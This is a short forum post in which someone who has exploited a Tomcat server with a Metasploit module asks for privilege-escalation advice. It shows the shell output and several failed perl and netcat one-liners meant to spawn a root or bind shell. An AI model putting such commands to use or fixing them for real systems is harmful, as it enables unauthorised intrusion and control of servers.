Hi there,

I just need some advices. I have exploited into tomcat (ubuntu server) and now I have difficult to get privilege because restriction:
Code:
exploit(tomcat_mgr_deploy)>

nc -h
OpenBSD netcat (Debian patchlevel 1.89-3ubuntu2)

id
uid=104(tomcat6) gid=113(tomcat6) groups=113(tomcat6)

hostname
ubuntu
uname -r
2.6.32-21-generic
I don't have permission to write, so i can't create file. Enumerate directory out of tomcat directory is not possible (ls /etc/pass..ect.)
I have saw that is possible to use netcat but pathlevel version(so -c and -e options are disabled) and perl command, so i have tried combination such as:
Code:
perl -e `{$ENV{PATH}='bin:/usr/bin';$>=0;$<=0;exec('/bin/bash');}`
perl -e `exec "nc -l -p /bin/bash";`

nc -e '/bin/bash' -l -p4321 -vvv
perl -e `exec '/bin/netcat -c "/bin/bash" -l -p4321';`
or exploit perl with some sc but doesn't work with the ones i found.

Any advices ?
Thanks in advance.

Cheers,